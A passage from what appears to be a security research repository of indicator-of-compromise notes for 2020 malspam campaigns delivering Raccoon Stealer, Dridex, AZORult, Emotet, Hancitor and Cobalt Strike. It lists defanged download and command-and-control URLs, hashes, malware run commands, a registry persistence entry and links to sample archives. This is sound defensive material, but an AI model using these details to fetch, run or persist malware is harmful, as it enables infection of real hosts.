├── 2020-08-20-Emotet-infection-with-Qakbot.pcap.zip ├── 2020-08-20-IOCs-for-Emotet-infection-with-Qakbot.txt ├── 2020-08-24-Trickbot-gtag-ono66-IOCs.txt ├── 2020-08-25-IOCs-for-Emotet-with-Trickbot.txt ├── 2020-09-01-raccoon-stealer-IOCs.txt ├── 2020-09-07-Dridex-IOCs.txt ├── 2020-09-21-Dridex-IOCs.txt ├── 2020-09-28-Qakbot-IOCs.txt ├── 2020-10-01-Formbook-IOCs.txt ├── 2020-10-05-AZORult-IOCs.txt ├── 2020-10-26-Emotet-epoch-2-with-Trickbot-gtag-mor137-IOCs.txt ├── 2020-11-05-Hancitor-IOCs.txt ├── 2020-11-16-Cobalt-Strike-IOCs.txt ├── 2020-11-23-SmokeLoader-Dridex-and-webshell-IOCs.txt ├── 2020-11-23-SmokeLoader-and-Dridex-infection-with-webshell.pcap.zip ├── 2020-12-02-Astaroth-IOCs.txt ├── 2020-12-02-Astaroth-email-and-malware.zip ├── 2020-12-10-IOCs-from-Ursnif-infection-with-Delf-variant.txt ├── 2020-12-10-Ursnif-infection-with-Delf-variant.pcap.zip ├── 2020-12-11-Zepplin-ransomware-note.txt ├── 2020-12-14-IOCs-from-Qakbot-activity.txt ├── 2021-01-05-Emotet-and-Trickbot-IOCs.txt ├── 2021-01-06-SystemBC-domain-list.txt ├── 2021-01-08-IOCs-from-Ave-Maria-RAT.txt ├── 2021-01-11-IOCs-for-Dridex-traffic-with-webshell.txt ├── 2021-01-20-IOCs-from-Emotet-epoch1-infection.txt ├── 2021-02-01-TA551-IOCs-for-Qakbot.txt ├── 2021-02-08-tech-zupport-scam-audio.mp3 ├── 2021-02-22-IOCs-from-Guildma-infection.txt ├── 2021-03-01-IcedID-IOCs.txt ├── 2021-03-08-IOCs-from-Banload-infection.txt ├── 2021-03-15-IcedID-IOCs.txt ├── 2021-03-15-IcedID-infection-traffic.pcap.zip ├── 2021-03-15-IcedID-malware-and-artifacts.zip ├── 2021-03-15-malspam-pushing-IcedID.eml.zip ├── 2021-03-22-Dridex-malspam-10-examples.zip ├── 2021-03-22-Dridex-malware-and-artifacts.zip ├── 2021-03-22-IOCs-from-Dridex-infection.txt ├── 2021-03-24-IOCs-for-IcedID-infection-with-Cobalt-Strike.txt ├── 2021-03-24-IcedID-malware-and-artifacts.zip ├── 2021-04-12-IcedID-IOCs.txt ├── 2021-04-12-IcedID-malware-and-artifacts.zip ├── 2021-04-15-IOCs-for-AsyncRAT-activity.txt ├── 2021-04-26-IcedID-with-Cobalt-Strike-IOCs.txt ├── 2021-04-26-IcedID-with-Cobalt-Strike-malware-and-artifacts.zip ├── 2021-04-26-IcedID-with-Cobalt-Strike-traffic.pcap.zip ├── 2021-05-10-IOCs-for-TA551-pushing-IcedID.txt ├── 2021-05-10-TA551-IcedID-malware-and-artifacts.zip ├── 2021-05-17-TA551-IOCs-for-IcedID.txt ├── 2021-05-17-TA551-IcedID-malware-and-artifacts.zip ├── 2021-06-07-Mirai-IOCs.md ├── 2021-06-21-TA551-IOCs-for-Ursnif.txt ├── 2021-06-28-TA551-IOCs-for-Trickbot.txt ├── 2021-07-12-Hancitor-IOCs.txt ├── 2021-07-20-IOCs-for-BazarLoader-and-Trickbot.txt ├── 2021-07-26-Trickbot-gtag-rob112.txt ├── 2021-07-29-IOCs-for-BazarLoader-CobaltStrike-PrintNightmare.txt ├── 2021-08-09-BazarLoader-and-Cobalt-Strike-IOCs.txt ├── 2021-08-16-Mirai-IOCs.md ├── 2021-08-18-phishing-example.txt ├── 2021-08-26-IOCs-for-DDoS-themed-BazarLoader-infection.txt ├── 2021-09-08-IOCs-for-Hancitor-with-Cobalt-Strike.txt ├── 2021-09-13-IOCs-for-TA551-Trickbot-with-Cobalt-Strike-and-DarkVNC.txt ├── 2021-09-20-IOCs-for-Squirrelwaffle-Loader-with-Cobalt-Strike.txt ├── 2021-09-29-TA551-BazarLoader-with-Cobalt-Strike-IOCs.txt ├── 2021-10-07-Qakbot-obama111-and-Cobalt-Strike-IOCs.txt ├── 2021-10-07-Qakbot-obama111-and-Cobalt-Strike-malware-and-artifacts.zip ├── 2021-10-18-IOCs-for-TR-based-Qakbot-with-Cobalt-Strike.txt ├── 2021-11-03-TA551-BazarLoader-info.txt ├── 2021-11-04-IOCs-for-TR-Qakbot-with-Cobalt-Strike.txt ├── 2021-11-05-TA551-IOCs.txt ├── 2021-11-15-IOCs-for-Matanbuchus-Qakbot-CobaltStrike-and-spambot-activity.txt ├── 2021-11-22-IOCs-for-Contact-Forms-campaign-activity.txt ├── 2021-12-07-IOCs-for-Qakbot-and-Matanbuchus-activity.txt ├── 2021-12-10-IOCs-for-TA551-IcedID-infection-with-Cobalt-Strike-and-DarkVNC.txt ├── 2022-01-04-IOCs-from-Remcos-RAT-infection.txt ├── 2022-01-05-IOCs-for-TA551-IcedID-with-Cobalt-Strike.txt ├── 2022-01-12-IOCs-for-IcedID-with-Cobalt-Strike-and-DarkVNC.txt ├── 2022-01-17-IOCs-for-Astaroth-Guildma-infection.txt ├── 2022-01-27-IOCs-for-Contact-Forms-IcedID-with-Cobalt-Strike.txt ├── 2022-02-07-IOCs-for-BazarLoader-with-Cobalt-Strike.txt ├── 2022-02-10-IOCs-for-Emotet-epoch5-infection-with-Cobalt-Strike.txt ├── 2022-02-17-IOCs-for-Bazil-targeted-malware-infection.txt ├── 2022-02-22-Emotet-epoch4-IOCs.txt ├── 2022-02-22-Emotet-epoch5-IOCs.txt ├── 2022-03-01-IOCs-for-Emotet-epoch4-with-Cobalt-Strike.txt ├── 2022-03-03-IOCs-for-Bazil-targeted-malware-infection.txt ├── 2022-03-03-IOCs-for-Emotet-epoch4-with-Cobalt-Strike.txt ├── 2022-03-14-IOCs-from-Emotet-epoch5-with-Cobalt-Strike.txt ├── 2022-03-21-IOCs-for-Cobalt-Strike-from-IcedID-infection.txt ├── 2022-03-29-IOCs-for-Emotet-and-Cobalt-Strike.txt ├── 2022-04-05-IOCs-for-Bumblebee-and-Cobalt-Strike.txt ├── 2022-04-12-IOCs-for-SpringShell-exploitation-by-Enemybot.txt ├── 2022-04-14-IOCs-for-aa-Qakbot-with-Cobalt-Strike.txt ├── 2022-04-19-IOCS-for-infection-from-Brazil-malspam.txt ├── 2022-04-25-IOCs-for-Emotet-epoch4.txt ├── 2022-05-03-IOCs-for-Contact-Forms-Bumblebee-and-Cobalt-Strike.txt ├── 2022-05-10-IOCs-for-Contact-Forms-IcedID-with-Cobalt-Strike.txt ├── 2022-05-15-Deadbolt-Ransomware.md ├── 2022-05-17-IOCS-for-aa-distribution-Qakbot-with-Cobalt-Strike.txt ├── 2022-05-23-IOCs-for-IcedID-and-DarkVNC.txt ├── 2022-06-07-IOCs-for-Emotet-with-Cobalt-Strike.txt ├── 2022-06-09-IOCs-from-TA578-Bumblebee-with-Cobalt-Strike.txt ├── 2022-06-14-IOCs-from-TA578-Bumblebee-with-Cobalt-Strike.txt ├── 2022-06-17-IOCs-for-Matanbuchus-with-Cobalt-Strike.txt ├── 2022-06-21-IOCs-for-AA-distribution-Qakbot-with-DarkVNC-and-Cobalt-Strike.txt ├── 2022-06-28-IOCs-for-TA578-IcedID-Cobalt-Strike-and-DarkVNC.txt ├── 2022-07-06-IOCs-for-TA578-contact-forms-IcedID-with-DarkVNC-and-Cobalt-Strike.txt ├── 2022-07-21-IOCs-for-IcedID-with-DarkVNC-and-Cobalt-Strike.txt ├── 2022-07-25-IOCs-for-IcedID-with-Cobalt-Strike.txt ├── 2022-08-03-IOCs-for-IcedID-and-Cobalt-Strike.txt ├── 2022-08-08-IOCs-for-IcedID-and-Cobalt-Strike.txt ├── 2022-08-10-IOCs-for-IcedID-and-Cobalt-Strike.txt ├── 2022-08-15-IOCs-for-Monster-Libra-SVCready.txt ├── 2022-08-29-IOCs-for-Monster-Libra-TA551-IcedID-with-Cobalt-Stike.txt ├── 2022-09-13-IOCs-for-Qakbot.txt ├── 2022-09-21-IOCs-for-Astaroth-Guildma-infection.txt ├── 2022-09-29-IOCs-for-Obama207-Qakbot-and-Cobalt-Strike.txt ├── 2022-10-04-IOCs-for-IcedID-infection-with-Cobalt-Strike.txt ├── 2022-10-10-IOCs-for-Cobalt-Strike-from-Qakbot-infection.txt ├── 2022-10-17-IOCs-for-IcedID-with-Cobalt-Strike.txt ├── 2022-10-31-IOCs-for-IcedID-with-DarkVNC-and-Cobalt-Strike.txt ├── 2022-11-03-IOCs-for-Emotet-with-IcedID.txt ├── 2022-11-07-IOCs-for-Emotet-infection-with-IcedID-and-Bumblebee.txt ├── 2022-11-28-IOCs-for-BB08-Qakbot-with-Cobalt-Strike.txt ├── 2022-12-07-IOCs-for-Bumblebee-infection-with-Cobalt-Strike.txt ├── 2022-12-09-IOCs-for-HTML-smuggling-to-ISO-files-for-Cobalt-Strike.txt ├── 2022-12-20-IOCs-for-IcedID-infection-with-Cobalt-Strike.txt ├── 2022-12-28-IOCs-for-NetSupport-RAT-infection.txt ├── 2022-12-29-IOCs-for-malware-from-fake-Adobe-Reader-page.txt ├── 2023-01-05-IOCs-from-Agent-Tesla-variant-infection.txt ├── 2023-01-12-IOCs-from-IcedID-and-Cobalt-Strike-infection.txt ├── 2023-01-16-IOCs-for-malware-from-fake-7zip-page.txt ├── 2023-01-23-IOCs-for-Google-ad-for-possible-TA505-activity.txt ├── 2023-01-31-BB12-Qakbot-infection-IOCs.txt ├── 2023-02-07-IOCs-for-probable-Matanbuchus-activity.txt ├── 2023-02-08-IOCs-for-Cobalt-Strike-from-IcedID.txt ├── 2023-02-13-IOCs-for-IcedID-infection-from-fake-Microsoft-Teams-page.txt ├── 2023-02-24-IOCs-for-IcedID-infection-with-BackConnect-and-Cobalt-Strike.txt ├── 2023-03-06-IOCs-for-Gozi-infection.txt ├── 2023-03-07-IOCs-for-Emotet-activity.txt ├── 2023-03-10-IOCs-for-CloakedUrsa-APT29-Activity.txt ├── 2023-03-16-IOCs-for-Emotet-E5-activity.txt ├── 2023-03-22-some-IOCs-for-Emotet-E4-activity.txt ├── 2023-04-05-IOCs-for-STRRAT-activity.txt ├── 2023-04-13-IOCs-for-MetaStealer-infection.txt ├── 2023-05-02-IOCs-for-obama259-Qakbot.txt ├── 2023-05-10-IOCs-for-IcedID-with-BackConnect-and-Keyhole-VNC-and-Cobalt-Strike.txt ├── 2023-05-10-IOCs-for-obama262-Qakbot-with-DarkCat-VNC-and-Cobalt-Strike.txt ├── 2023-05-17-IOCs-for-Pikabot-with-Cobalt-Strike.txt ├── 2023-05-22-IOCs-for-Pikabot-infection-with-Cobalt-Strike.txt ├── 2023-05-23-IOCs-for-Pikabot-with-Cobalt-Strike.txt ├── 2023-06-28-IOCs-for-IcedID-activity.txt ├── 2023-07-12-IOCs-from-Gozi-infection-with-Cobalt-Strike.txt ├── 2023-08-03-IOCs-for-malicious-ad-to-Danabot.txt ├── 2023-08-09-IOCs-from-IcedID-infection.txt ├── 2023-08-10-moved-to-new-Github-repository.txt ├── Mirai_updated_F5 └── README.md /2020-08-20-Emotet-infection-with-Qakbot.pcap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2020-08-20-Emotet-infection-with-Qakbot.pcap.zip -------------------------------------------------------------------------------- /2020-09-01-raccoon-stealer-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2020-09-01 (TUESDAY) - RACCOON STEALER 2 | 3 | EMAIL INFO: 4 | 5 | - Date: Wed, 2 Sep 2020 00:48:48 +0800 (HKT) 6 | - Received: from mail.grandco.com.hk ([223.255.188.26]) 7 | - From: 8 | - Subject: Purchase Order 9 | - Message-ID: <956139821.4117.1598978928194.JavaMail.root@mail.grandco.com.hk> 10 | - Attachment: Purchase Order.xlsx 11 | 12 | ASSOCIATED MALWARE: 13 | 14 | - SHA256 hash: 2ed32602e42ca10c7b505a3581ddb0dbbe0f3e19a6e8a63e6ff0a7325ca54a3b 15 | - File size: 573,197 bytes 16 | - File name: Purchase Order.xlsx 17 | - File description: Excel spreadsheet with CVE-2017-11882 exploit for Raccoon Stealer 18 | 19 | - SHA256 hash: c91e2df02ad2c8ccadc96054bceee4422382caa62d443e2633a003e4ce5c7476 20 | - File size: 507,904 bytes 21 | - File location: hxxp://boyama.medyanef[.]com/vendor/league/fractal/files/c7f6e7.exe 22 | - File location: C:\Users\[username]\AppData\Roaming\RichX.com 23 | - File description: Windows executable (EXE) file for Raccoon Stealer 24 | 25 | INFECTION TRAFFIC: 26 | 27 | - 93.113.63[.]58 port 80 - boyama[.]medyanef[.]com - GET /vendor/league/fractal/files/c7f6e7.exe 28 | - 195.201.225[.]248 port 443 - telete[.]in - HTTPS traffic 29 | - 34.89.241[.]53 port 80 - 34.89.241[.]53 - POST /gate/log.php 30 | - 34.89.241[.]53 port 80 - 34.89.241[.]53 - GET /gate/sqlite3.dll 31 | - 34.89.241[.]53 port 80 - 34.89.241[.]53 - GET /gate/libs.zip 32 | - 34.89.241[.]53 port 80 - 34.89.241[.]53 - POST /file_handler4/file.php?hash=[hash string and other parameters] -------------------------------------------------------------------------------- /2020-09-21-Dridex-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2020-09-21 - INFECTION FROM DRIDEX MALSPAM 2 | 3 | EMAIL HEADER DATA: 4 | 5 | - Received: from [91.81.229.185] (unknown [91.81.229.185]) by [removed]; Mon, 21 Sep 2020 14:25:24 +0200 (CEST) 6 | - Received: from [1.124.14.21] (helo=FAWADUM.esa4.dhl-out.iphmx.com) by [removed] (envelope-from watercourse71@gateway2d.dhl.com) [removed]; Mon, 21 Sep 2020 13:25:24 +0100 7 | - Date: Mon, 21 Sep 2020 13:25:24 +0100 8 | - From: BillingOnline 9 | - Subject: FedEx Billing Online - Invoice Ready for Payment 10 | 11 | ONE OF AT LEAST 10 URLS GENERATED BY EXCEL MACRO: 12 | 13 | - hxxps://cdn.applimmo[.]com/wxmn5b.pdf 14 | - hxxps://mazimimarlik[.]com/ow1oorywn.pdf 15 | - hxxps://lamesuspendue.swayb[.]com/pxxnmie14.zip 16 | - hxxps://laptopsservicecenter[.]in/s3k9ebe2.pdf 17 | - hxxps://mail.168vitheyrealestate[.]com/k5hkyj0.zip 18 | - hxxps://retrodays[.]pt/lhtzu8p.zip 19 | - hxxps://skybeetravels.cheapflightso[.]co[.]uk/py198k.pdf 20 | - hxxps://starsignsdates[.]com/hurxlu8.pdf 21 | - hxxps://stepco[.]ro/wij87mvg.txt 22 | - hxxps://update.cabinetulieru[.]ro/thhqpn.txt 23 | 24 | DRIDEX POST-INFECTION HTTPS TRAFFIC 25 | 26 | - 51.75.24[.]85 port 443 27 | - 109.169.24[.]37 port 453 28 | 29 | ASSOCIATED MALWARE: 30 | 31 | - SHA256 hash: 3259221b5378b9c9a983ae265527662c0c7856f6664a9a734754f549ee4d7a33 32 | - File size: 28,618 bytes 33 | - File name: 5-107-26477.xlsm 34 | - File description: Excel spreadsheet with macro for Dridex 35 | 36 | - SHA256 hash: 5b4337f9ae1d91113c91abd0da39794d8aa216b149562440de541ca99618840d 37 | - File size: 331,776 bytes 38 | - File location: xxps://cdn.applimmo[.]com/wxmn5b.pdf 39 | - File location: C:\XMjrcrYY\WZzAVF\XkZVNh 40 | - Run method: regsvr32.exe /s [file name] 41 | - File description: DLL installer retrieved by Excel macro for Dridex 42 | - Note: Random characters for directory path and file name each infection 43 | 44 | - SHA256 hash: 55067d633bef8350b5de24e3e9f153fc4a6765af0af168fb444a6329c701b10a 45 | - File size: 1,017,344 bytes 46 | - File location: C:\Users\[username]\AppData\Roaming\Microsoft\Templates\LiveContent\bGGj9sX\MFC42u.DLL 47 | - File description: Dridex malware DLL 48 | - Note: Run by copy of legitimate system file DevicePairingWizard.exe in the same directory 49 | 50 | - SHA256 hash: 8a7cc23e3b7af9ebd2d1dd3791bb62bd1da1efd3d2c480fa51483552520abd0a 51 | - File size: 1,012,224 bytes 52 | - File location: C:\Users\[username]\AppData\Roaming\Sun\0umgO\WTSAPI32.dll 53 | - File description: Dridex malware DLL 54 | - Note: Run by copy of legitimate system file rdpclip.exe in the same directory 55 | 56 | - SHA256 hash: eb3c152be59903d29cf02100ed2f9edea183a37882a68ae5655bcbc9004775d8 57 | - File size: 1,009,664 bytes 58 | - File location: C:\Users\[username]\AppData\Roaming\Thunderbird\Profiles\1ovarfyl.default-release\ImapMail\.outlook.com\yFYLx\XmlLite.dll 59 | - File description: Dridex malware DLL 60 | - Note: Run by copy of legitimate system file sppsvc.exe in the same directory 61 | -------------------------------------------------------------------------------- /2020-10-05-AZORult-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2020-10-05 (MONDAY) - MALSPAM WITH XLS ATTACHMENT PUSHES AZORULT MALWARE 2 | 3 | EMAIL HEADERS: 4 | 5 | Return-Path: 6 | Authentication-Results: [removed]; iprev=pass policy.iprev="203.78.160.41"; spf=neutral smtp.mailfrom="neeltravels@infoclub.com.np" smtp.helo="mx2.info.com.np"; dkim=none (message not signed) header.d=none; dmarc=none (p=nil; dis=none) header.from=infoclub.com.np 7 | Received: from [203.78.160.41] ([203.78.160.41:42046] helo=mx2.info.com.np) 8 | by [removed] (envelope-from ) 9 | [removed] ; Mon, 05 Oct 2020 10:21:53 -0400 10 | Received: from localhost (localhost [127.0.0.1]) 11 | by mx2.info.com.np (Postfix) with ESMTP id 9D004C010EEDA; 12 | Mon, 5 Oct 2020 20:05:27 +0545 (+0545) 13 | Received: from mx2.info.com.np ([127.0.0.1]) 14 | by localhost (mx2.info.com.np [127.0.0.1]) (amavisd-new, port 10032) 15 | with ESMTP id NxFAiUUDPfZM; Mon, 5 Oct 2020 20:05:26 +0545 (+0545) 16 | Received: from localhost (localhost [127.0.0.1]) 17 | by mx2.info.com.np (Postfix) with ESMTP id B3A6BC01205B7; 18 | Mon, 5 Oct 2020 20:05:25 +0545 (+0545) 19 | Received: from mx2.info.com.np ([127.0.0.1]) 20 | by localhost (mx2.info.com.np [127.0.0.1]) (amavisd-new, port 10026) 21 | with ESMTP id 2Hz7ajN5BfmV; Mon, 5 Oct 2020 20:05:25 +0545 (+0545) 22 | Received: from mx2.info.com.np (mx2.info.com.np [203.78.160.41]) 23 | by mx2.info.com.np (Postfix) with ESMTP id B1E23C010EED6; 24 | Mon, 5 Oct 2020 20:05:23 +0545 (+0545) 25 | Date: Mon, 5 Oct 2020 20:05:23 +0545 (NPT) 26 | From: neeltravels@infoclub.com.np 27 | Message-ID: <335140558.5692.1601907623511.JavaMail.zimbra@infoclub.com.np> 28 | In-Reply-To: <1021474505.5156.1601907307814.JavaMail.zimbra@infoclub.com.np> 29 | References: <602698068.4733.1601907066008.JavaMail.zimbra@infoclub.com.np> <1860825462.4783.1601907203188.JavaMail.zimbra@infoclub.com.np> <484309969.4798.1601907221459.JavaMail.zimbra@infoclub.com.np> <1444625393.4863.1601907238395.JavaMail.zimbra@infoclub.com.np> <1285123696.4933.1601907261734.JavaMail.zimbra@infoclub.com.np> <1879308695.4992.1601907285968.JavaMail.zimbra@infoclub.com.np> <1021474505.5156.1601907307814.JavaMail.zimbra@infoclub.com.np> 30 | Subject: Order confirmation 31 | MIME-Version: 1.0 32 | Content-Type: multipart/mixed; 33 | boundary="----=_Part_5684_151580814.1601907623466" 34 | X-Mailer: Zimbra 8.6.0_GA_1153 (ZimbraWebClient - FF81 (Win)/8.6.0_GA_1153) 35 | Thread-Topic: Order confirmation 36 | Thread-Index: 2VBCTeFcpKsqezW/qovDHEXVLMew2cAVOyZvAX/6jocf2g0v5XT0r/qLX4VEbQbMwFb9VbHuNr30 37 | 38 | Attachment name: 0617773.xls 39 | 40 | ASSOCIATED MALWARE: 41 | 42 | - SHA256 hash: 024512629393c80c1434eb25694c9f1e65d813cd3c273c6d97572ec62d8ad655 43 | - File size: 462848 bytes 44 | - File name: 0617773.xls 45 | - File description: Excel spreadsheet with macro for AZORult malware 46 | 47 | - SHA256 hash: b2fe9bcc932ea65ec98318fd983e862172123cab111e728d97c23258749521c7 48 | - File size: 308,736 bytes 49 | - File location: hxxp://192.236.178[.]80/7z/0617773.jpg 50 | - File location: C:\Users\Public\whpfwkrul.exe (initial location) 51 | - File location: C:\Users\[username]\chrmo.exe (persistent location) 52 | - File description: Windows EXE for AZORult 53 | 54 | MALWARE PERSISTENCE (REGISTRY UPDATE): 55 | 56 | - Registry key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 57 | - Value name: nspj 58 | - Value type: REG_SZ 59 | - Value data: C:\WINDOWS\system32\pcalua.exe -a C:\Users\[username]\chrmo.exe 60 | 61 | INFECTION TRAFFIC: 62 | 63 | - 192.236.178[.]80 port 80 - 192.236.178[.]80 - GET/7z/0617773.jpg 64 | - 198.50.160[.]198 port 80 - books.myscriptcase[.]com - POST /index.php -------------------------------------------------------------------------------- /2020-10-26-Emotet-epoch-2-with-Trickbot-gtag-mor137-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2020-10-26 (MONDAY) - EMOTET EPOCH 2 INFECTION WITH TRICKBOT GTAG MOR137 2 | 3 | - SHA256 hash: 8d1691f2c09cc9372b30697a8e5c5ea2d7377673195c7eefc1fdb44e727332a3 4 | - File size: 182,784 bytes 5 | - File location: hxxp://worldkhobor[.]com/wp-admin/l/ 6 | - File name: FILE_JKO_100120_WGF_102620.doc 7 | - File description: Word doc with macros for Emotet (Epoch 2) 8 | 9 | - SHA256 hash: ea85a6c527fc7174b1b953e6d5b2a617e79703ad1fa1db9f4ba131e0a477a544 10 | - File size: 180,224 bytes 11 | - File location: hxxps://needhelp[.]gr/wp-includes/Qlpz/ 12 | - File location: C:\Users\[username]\Uflw5pa\W18vpk2\Nfd9nts.exe 13 | - File location: C:\Users\[username]\AppData\Local\SyncHost\subst.exe 14 | - File description: Emotet EXE (Epoch 2) 15 | 16 | - SHA256 hash: 58c4bea082b2f44f0beab5356ae2bc9bc73c3f13ab0491861bc2ba24690da103 17 | - File size: 806,912 bytes 18 | - File location: C:\Users\[username]\AppData\Local\SyncHost\sfc8b4.exe 19 | - File location: C:\Users\[username]\AppData\Roaming\Identities1159371911\sfc8b4.exe 20 | - File description: Trickbot gtag mor137 retrieved by Emotet-infected host -------------------------------------------------------------------------------- /2020-11-05-Hancitor-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2020-11-05 (THURSDAY) - MALSPAM PUSHING HANCITOR WITH FICKER STEALER 2 | 3 | DATA FROM 5 EMAIL EXAMPLES: 4 | 5 | - Date: Thu, 05 Nov 2020 17:00:06 +0000 6 | - Date: Thu, 05 Nov 2020 17:10:35 +0000 7 | - Date: Thu, 05 Nov 2020 17:55:53 +0000 8 | - Date: Thu, 05 Nov 2020 16:43:48 +0000 9 | - Date: Thu, 05 Nov 2020 18:35:05 +0000 10 | - Date: Thu, 05 Nov 2020 18:35:18 +0000 11 | 12 | - Received: from ithelpinc[.]org ([202.212.14[.]56]) 13 | - Received: from ithelpinc[.]org ([24.247.141[.]190]) 14 | - Received: from ithelpinc[.]org ([76.108.208[.]220]) 15 | - Received: from ithelpinc[.]org ([91.183.51[.]218]) 16 | - Received: from ithelpinc[.]org ([95.43.129[.]130]) 17 | 18 | - From: "DocuSign Electronic Signature and Invoice Service" 19 | - From: "DocuSign Electronic Signature and Invoice Service" 20 | - From: "DocuSign Signature and Invoice Service" 21 | - From: "DocuSign Signature and Invoice Service" 22 | - From: "DocuSign Electronic Signature " 23 | 24 | LINKS FROM THE EMAILS: 25 | 26 | - hxxps://docs.google[.]com/document/d/e/2PACX-1vS9eYBTxfr5CxwRCgbj4pTgB8lYGoJmX5OCd3sC9FWqvH4lSeF9xB9jCEyORQ-5Zq2p9wKzANWKhDJC/pub 27 | - hxxps://docs.google[.]com/document/d/e/2PACX-1vSbGqFLcGVhFotIYWaVVVa10mQzpa3K-ZvHiIgmXuXlBNn30VsrifoFCbJiATr59q1N2GW_Ql2Qekft/pub 28 | - hxxps://docs.google[.]com/document/d/e/2PACX-1vTw6IC-OOkyMoyGFzz8a3vHzMOt7SjXENwp7MRU9t6E1ksTa4453G8cZP9h_WMiqqqoHrOrt5x31vNl/pub 29 | - hxxps://docs.google[.]com/document/d/e/2PACX-1vTmbkS2yR03U4Ai05mEEPk6VmzE-WvPDSJevHXVSJIvF4IBseobfEhlTgX90xdKM01WbMEnbH5TpmKw/pub 30 | - hxxps://docs.google[.]com/document/d/e/2PACX-1vTDw0DsSLMSPUztBwnF5RfHDG43G00uIjp5xKT_4dpXZXIxuy0CXN3muPla1t07cmDEHROvgpoNck9u/pub 31 | 32 | REDIRECT URLS FROM THE ABOVE GOOGLE DOCS PAGES TO DOWNLOAD WORD DOC FOR HANCITOR: 33 | 34 | - hxxps://ideas.bizbrio[.]com/phone.php 35 | - hxxps://rishtiindia[.]com/count.php 36 | - hxxps://pixellanestudios[.]com/permission.php 37 | - hxxps://crazydeal101[.]com/play.php 38 | 39 | ASSOCIATED MALWARE: 40 | 41 | - SHA256 hash: 9d8cb1204c8357152aec8acbf14092de7edd88189eaa6f9cfb8b9b8dbff001e8 42 | - File size: 375,261 bytes 43 | - File name: 1105_748543.doc 44 | - File description: Word doc with macro for Hancitor malware 45 | 46 | - SHA256 hash: 09b3c97457d3ad02204f2da76d1f9f4dadc681bcb32b0a58469461df2f7bd6b7 47 | - File size: 314,368 bytes 48 | - File location: C:\Users\[username]\AppData\Roaming\Microsoft\Templates\calc.dll 49 | - File description: DLL file for Hancitor 50 | - File run method: rundll32.exe calc.dll,Start 51 | 52 | - SHA256 hash: 9bdbb8dde9ad9be8d9303df1697e13a0f846cca95bc9e41d513c1f5f2a7a37b3 53 | - File size: 272,910 bytes 54 | - File location: hxxp://ithelpstaffing[.]com/f4n.exe 55 | - File description: follow-up malware, Ficker Stealer 56 | 57 | HANCITOR INFECTION TRAFFIC: 58 | 59 | - port 80 - api.ipify.org - GET / 60 | - 193.47.35[.]27 port 80 - albilverde[.]com - POST /7/forum.php 61 | - 5.187.5[.]246 port 80 - fabickng[.]ru - POST /7/forum.php 62 | - 179.43.160[.]81 port 80 - fineladiver[.]ru - POST /7/forum.php 63 | 64 | FICKER STEALER INFECTION TRAFFIC: 65 | 66 | - 47.254.169[.]130 port 80 - ithelpstaffing[.]com - GET /f4n.exe 67 | - port 80 - api.ipify.org - GET /?format=xml 68 | - 62.76.40[.]132 port 80 - cussoricti[.]com - TCP traffic (not HTTP) -------------------------------------------------------------------------------- /2020-11-16-Cobalt-Strike-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2020-11-16 (MONDAY) - XLSX SPREADSHEET PUSHES COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - We've seen this spreadsheet template normally push Qakbot until mid-November 2020, when it started pushing other families of malware instead of Qakbot. 6 | - Since mid-November 2020, we've occasionally seen this spreadsheet template push SmokeLoader or Cobalt Strike malware. 7 | 8 | ASSOCIATED MALWARE: 9 | 10 | - SHA256 hash: 4af251feed5a80976f897a0749147b74ec92ad90695eea87eeb21f83a41cff7f 11 | - File size: 366,296 bytes 12 | - File name: Document11355.xlsb 13 | - File description: XLSX file with macros for Cobalt Strike 14 | 15 | - SHA256 hash: c81cbf497e7427936c0f15290fe4a1648c8fc10c249d3b97e67897bd1e2808b6 16 | - File size: 237,568 bytes 17 | - File location: hxxp://99promo[.]com/ds/161120.gif 18 | - File location: C:\1b3SX\iD93\tor.exe 19 | - File description: Windows executable file (EXE) for Cobalt Strike 20 | 21 | INFECTION TRAFFIC: 22 | 23 | - 35.209.123[.]121 port 80 - 99promo[.]com - GET /ds/161120.gif 24 | - 185.99.133[.]180 port 80 - 185.99.133[.]180 - GET /IE9CompatViewList.xml 25 | - 185.99.133[.]180 port 80 - 185.99.133[.]180 - POST /submit.php?id=12345678 26 | - NOTE: 1245678 in the above line replaces an 8-digit identification number for the infected Windows host -------------------------------------------------------------------------------- /2020-11-23-SmokeLoader-and-Dridex-infection-with-webshell.pcap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2020-11-23-SmokeLoader-and-Dridex-infection-with-webshell.pcap.zip -------------------------------------------------------------------------------- /2020-12-02-Astaroth-email-and-malware.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2020-12-02-Astaroth-email-and-malware.zip -------------------------------------------------------------------------------- /2020-12-10-IOCs-from-Ursnif-infection-with-Delf-variant.txt: -------------------------------------------------------------------------------- 1 | 2020-12-10 (THURSDAY) - EXCEL MACRO PUSHES URSNIF (GOZI/IFSB) WITH DELF VARIANT 2 | 3 | NOTES: 4 | 5 | - This is part of a long-running campaign that has used email attachments to distribute various families of malware. 6 | - The attached Word or Excel documents use a resume theme, and they have macros designed to infect a vulnerable Windows host. 7 | - In recent weeks, Excel spreadsheets from this campaign pushed IcedID malware. 8 | - This week, the spreadsheets are pushing Ursnif (Gozi/ISFB) malware. 9 | - In this example, the follow-up malware is an information stealer, possibly from the Delf malware family. 10 | - For more information about Ursnif/Gozi/ISFB, see: https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi 11 | - For more information about Delf, see: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Delf&threatId=17696 12 | 13 | PCAP OF TRAFFIC FROM THIS INFECTION: 14 | 15 | - https://github.com/pan-unit42/tweets/blob/master/2020-12-10-Ursnif-infection-with-Delf-variant.pcap.zip 16 | 17 | DATE/TIME FOR START OF THE INFECTION: 18 | 19 | - 2020-12-10 (Thursday) at 00:19 UTC 20 | 21 | ASSOCIATED MALWARE: 22 | 23 | - SHA256 